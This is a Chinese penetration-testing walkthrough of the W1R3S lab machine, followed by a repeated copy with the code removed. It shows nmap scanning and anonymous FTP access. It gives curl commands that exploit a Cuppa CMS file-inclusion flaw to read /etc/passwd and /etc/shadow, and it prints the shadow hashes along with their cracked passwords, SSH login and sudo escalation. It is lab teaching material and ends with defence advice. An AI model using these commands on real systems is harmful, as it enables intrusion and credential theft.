w1res靶场渗透笔记
字数 939 2025-08-11 17:40:24

W1R3S靶场渗透教学文档

1. 信息收集阶段

1.1 主机发现

使用nmap进行主机发现:

nmap -sn 192.168.18.142/24

发现目标主机:

W1R3S.lan (192.168.18.216)
MAC Address: 00:0C:29:53:6C:C0 (VMware)

1.2 端口扫描

使用nmap进行端口扫描:

nmap -sS -sV -T4 -O 192.168.18.216

扫描结果:

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)

1.3 端口脚本扫描

使用nmap脚本扫描:

nmap --script=vuln 192.168.18.216

重要发现:

  • HTTP服务存在Slowloris DOS攻击漏洞(CVE-2007-6750)
  • 发现WordPress登录页面(/wordpress/wp-login.php)

2. 漏洞发现与利用

2.1 FTP服务(21端口)渗透

  1. 匿名登录测试:
ftp 192.168.18.216
Name: anonymous
Password: (任意或留空)

成功登录后发现目录结构:

content/
docs/
new-employees/
  1. 下载文件:
mget *

获取的文件:

  • 01.txt
  • 02.txt
  • 03.txt
  • employee-names.txt
  • worktodo.txt
  1. 文件分析:
  • 02.txt内容解密: 
    01ec2d8fc11c493b25029fb1f47f39ce:This is not a password
SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg== -> "It is easy, but not that easy.."
  • employee-names.txt内容: 
    Naomi.W - Manager
Hector.A - IT Dept
Joseph.G - Web Design
Albert.O - Web Design
Gina.L - Inventory
Rico.D - Human Resources
  • worktodo.txt内容解密: 
    I don't think this is the way to root!
we have a lot of work to do
stop playing around....

2.2 Web服务(80端口)渗透

  1. 目录扫描:
    发现重要路径:
/administrator/installation/
/index.html

  1. 识别CMS:
    发现是Cuppa CMS,版本为Beta

  2. 搜索漏洞:

searchsploit cuppa cms

发现文件包含漏洞(25971.txt)

  1. 漏洞利用:
    文件包含漏洞位于:
/administrator/alerts/alertConfigField.php

利用方式:

curl --data-urlencode "urlConfig=/etc/passwd" http://192.168.18.216/administrator/alerts/alertConfigField.php
  1. 获取敏感信息:
  • 获取/etc/shadow文件:
curl --data-urlencode "urlConfig=/etc/shadow" http://192.168.18.216/administrator/alerts/alertConfigField.php

提取的重要hash:

root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.
  1. 密码破解:
    使用John the Ripper:
john hashdow

破解结果:

www-data (www-data)
computer (w1r3s)

2.3 SSH服务(22端口)渗透

使用破解的凭据登录:

ssh w1r3s@192.168.18.216
Password: computer

检查sudo权限:

sudo -l

结果:

User w1r3s may run the following commands on W1R3S.lan:
    (ALL : ALL) ALL

3. 权限提升

由于w1r3s用户拥有ALL权限,可直接获取root权限:

sudo su

4. 渗透总结

4.1 FTP服务利用要点

  1. 匿名登录检查
  2. 文件下载与分析
  3. 敏感信息提取与解密

4.2 Web服务利用要点

  1. 目录扫描发现管理后台
  2. CMS版本识别与漏洞搜索
  3. 文件包含漏洞利用
  4. 敏感文件读取
  5. 密码hash提取与破解

4.3 SSH服务利用要点

  1. 使用破解的凭据尝试登录
  2. 检查sudo权限

4.4 整体渗透思路

  1. 信息收集(主机发现、端口扫描)
  2. 服务识别与漏洞搜索
  3. 漏洞利用与权限获取
  4. 权限提升
  5. 清除痕迹

5. 防御建议

  1. 禁用FTP匿名登录
  2. 及时更新CMS系统
  3. 修复文件包含漏洞
  4. 使用强密码策略
  5. 限制sudo权限
  6. 定期检查系统日志

6. 扩展学习

建议观看详细讲解视频:
「红队笔记」学渗透必打百台靶机实操精讲-W1R3S

W1R3S靶场渗透教学文档 1. 信息收集阶段 1.1 主机发现 使用nmap进行主机发现: 发现目标主机: 1.2 端口扫描 使用nmap进行端口扫描: 扫描结果: 1.3 端口脚本扫描 使用nmap脚本扫描: 重要发现: HTTP服务存在Slowloris DOS攻击漏洞(CVE-2007-6750) 发现WordPress登录页面(/wordpress/wp-login.php) 2. 漏洞发现与利用 2.1 FTP服务(21端口)渗透 匿名登录测试: 成功登录后发现目录结构: 下载文件: 获取的文件: 01.txt 02.txt 03.txt employee-names.txt worktodo.txt 文件分析: 02.txt内容解密: employee-names.txt内容: worktodo.txt内容解密: 2.2 Web服务(80端口)渗透 目录扫描: 发现重要路径: 识别CMS: 发现是Cuppa CMS,版本为Beta 搜索漏洞: 发现文件包含漏洞(25971.txt) 漏洞利用: 文件包含漏洞位于: 利用方式: 获取敏感信息: 获取/etc/shadow文件: 提取的重要hash: 密码破解: 使用John the Ripper: 破解结果: 2.3 SSH服务(22端口)渗透 使用破解的凭据登录: 检查sudo权限: 结果: 3. 权限提升 由于w1r3s用户拥有ALL权限,可直接获取root权限: 4. 渗透总结 4.1 FTP服务利用要点 匿名登录检查 文件下载与分析 敏感信息提取与解密 4.2 Web服务利用要点 目录扫描发现管理后台 CMS版本识别与漏洞搜索 文件包含漏洞利用 敏感文件读取 密码hash提取与破解 4.3 SSH服务利用要点 使用破解的凭据尝试登录 检查sudo权限 4.4 整体渗透思路 信息收集(主机发现、端口扫描) 服务识别与漏洞搜索 漏洞利用与权限获取 权限提升 清除痕迹 5. 防御建议 禁用FTP匿名登录 及时更新CMS系统 修复文件包含漏洞 使用强密码策略 限制sudo权限 定期检查系统日志 6. 扩展学习 建议观看详细讲解视频: 「红队笔记」学渗透必打百台靶机实操精讲-W1R3S